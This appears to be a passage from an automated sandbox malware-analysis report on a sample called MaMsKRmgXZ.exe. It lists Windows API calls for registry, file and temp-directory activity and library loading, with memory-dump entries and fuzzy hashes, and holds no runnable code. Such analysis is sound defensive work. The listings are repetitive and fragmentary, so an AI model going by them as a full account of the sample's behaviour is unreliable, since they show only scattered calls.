                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                                                                                                                      • Instruction ID: 3754a530b6758dc8908f2ef617aa9c280200ea706ec51d0fb7e67c491179f4d9
                                                                                                                                      • Opcode Fuzzy Hash: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                                                                                                                      • Instruction Fuzzy Hash: A3012831724210ABE7294B389D04B2A369CE710328F11823BF811F72F1D6B8DC02DB4D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402409
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402412
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseDeleteValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2831762973-0
                                                                                                                                      • Opcode ID: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
                                                                                                                                      • Instruction ID: ce1450a8ab12a7957634bce685e0bfb7e2b45ee5234afc219fd3c41b35330c67
                                                                                                                                      • Opcode Fuzzy Hash: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
                                                                                                                                      • Instruction Fuzzy Hash: AAF0F672E04120ABD700AFB89B4DAAE72A89B44304F11017BF202B72C1D5F85E02826E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                                                                                      • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentExpandStringslstrcmp
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1938659011-0
                                                                                                                                      • Opcode ID: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
                                                                                                                                      • Instruction ID: 79d5ad403a5aaaf22ef605bc71de2bbac2c7999a6642915e38ea97ae4a47edd5
                                                                                                                                      • Opcode Fuzzy Hash: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
                                                                                                                                      • Instruction Fuzzy Hash: BAF0A771B09240EBCB21DF759D44A9F7FE8EF91354B10803BE145F6290D2388901CB5D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                      • Opcode ID: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
                                                                                                                                      • Instruction ID: ea2ebfb6392eb1d35c1d77cf7a204b1acfca181ccf64587d83a13520139c7bad
                                                                                                                                      • Opcode Fuzzy Hash: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
                                                                                                                                      • Instruction Fuzzy Hash: C8E012B2A08210DFD715DFA8AA859AE77B4FB84325F10493BE102F12D1D7B85940965D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                                                                        • Part of subcall function 00406304: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
                                                                                                                                        • Part of subcall function 00406304: wsprintfA.USER32 ref: 00406354
                                                                                                                                        • Part of subcall function 00406304: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                      • Opcode ID: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                                                                                                                      • Instruction ID: 5c1bd2d9329a739c8a877d318ed38f6c7ac4115b407851283e1fe7e546b0050a
                                                                                                                                      • Opcode Fuzzy Hash: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                                                                                                                      • Instruction Fuzzy Hash: 85E08C32A08210ABD7106B709D0493B72E89B85700302483EFE0AF2191D738EC21AAA9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 00405B77
                                                                                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                      • Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                                                                                                      • Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
                                                                                                                                      • Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                                                                                                      • Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,00403228,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040564A
                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405658
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                      • Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                                                                                                      • Instruction ID: fc3bbe6b068c7ca676e2af9f6a434936c7df2cd1c21a2d5f2b74ac8b5b27fed5
                                                                                                                                      • Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                                                                                                      • Instruction Fuzzy Hash: 0BC08C30688101AADA002B308D08B073A55AB20340F608836600AE00F0CA32A600DD3F
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SetFilePointer.KERNELBASE(00000000), ref: 6EC02AF7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                      • Opcode ID: 09516d26107ce9cb400688d6f09b61870b881af300f14b22321d9b88c7e7cbe1
                                                                                                                                      • Instruction ID: 5532a4d45eefe350ad6adb22008fba38bef99c9473150db771748cdbe6536fb2
                                                                                                                                      • Opcode Fuzzy Hash: 09516d26107ce9cb400688d6f09b61870b881af300f14b22321d9b88c7e7cbe1
                                                                                                                                      • Instruction Fuzzy Hash: 1B416E72504604DFDF289FE4D9A0B9A377CFB5531CF218C29E505E7106E7379A928BA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: wsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2111968516-0
                                                                                                                                      • Opcode ID: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                                                                                                                      • Instruction ID: 3a2c95f3f261f3e7b92da62a1208cffd6d7f8b014e901ac2ca999815bcbce589
                                                                                                                                      • Opcode Fuzzy Hash: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                                                                                                                      • Instruction Fuzzy Hash: 2D21C770C0428AAADF219F644A456BFBB709B11318F14447FE891B63D1C1BD9981CB6D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D
                                                                                                                                        • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                      • Opcode ID: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
                                                                                                                                      • Instruction ID: f53dea761aa5693b03f4aeaa9096613f160725ff62c28ab2a383c2bfee997f34
                                                                                                                                      • Opcode Fuzzy Hash: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
                                                                                                                                      • Instruction Fuzzy Hash: 5AE0EDB1A04215BBD702AB95AE89DBE776CEB44315F10043BF201F11C1C67D4941966E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 390214022-0
                                                                                                                                      • Opcode ID: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
                                                                                                                                      • Instruction ID: fe35eca7c2654f279d717fea31bdeaa6937bb5491eee9e26a1e5aab6719f7fed
                                                                                                                                      • Opcode Fuzzy Hash: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
                                                                                                                                      • Instruction Fuzzy Hash: B2E04F31A003256BDB213EB25E8ED6F3669AB84744B16113BFA01BA2C2D9BC1C05C26D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402BDD,00000000,?,?), ref: 00405EB7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                                                                                                                      • Instruction ID: 95beb03159e1ed36dc188c03c0911f4594c5194c551a9f11594fd4679c6f4357
                                                                                                                                      • Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                                                                                                                      • Instruction Fuzzy Hash: 23E0ECB2014109BEEF095F90ED0ADBB371DEB04315F00492EFA06E4090E7B5A920AA75
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,004031B8,00000000,004128C0,00000020,004128C0,00000020,000000FF,00000004,00000000), ref: 00405C2E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                      • Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                                                                                                                      • Instruction ID: 28dd51bc99cbbe9e43bc3b4155210361b58306b45153a5fd00399a3e640b4bcc
                                                                                                                                      • Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                                                                                                                      • Instruction Fuzzy Hash: 3AE0EC3261835AABEF249E559C01EEB7B6CEB05360F044472FD15E6150D231E8219FA9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031EA,00000000,00000000,00403047,000000FF,00000004,00000000,00000000,00000000), ref: 00405BFF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
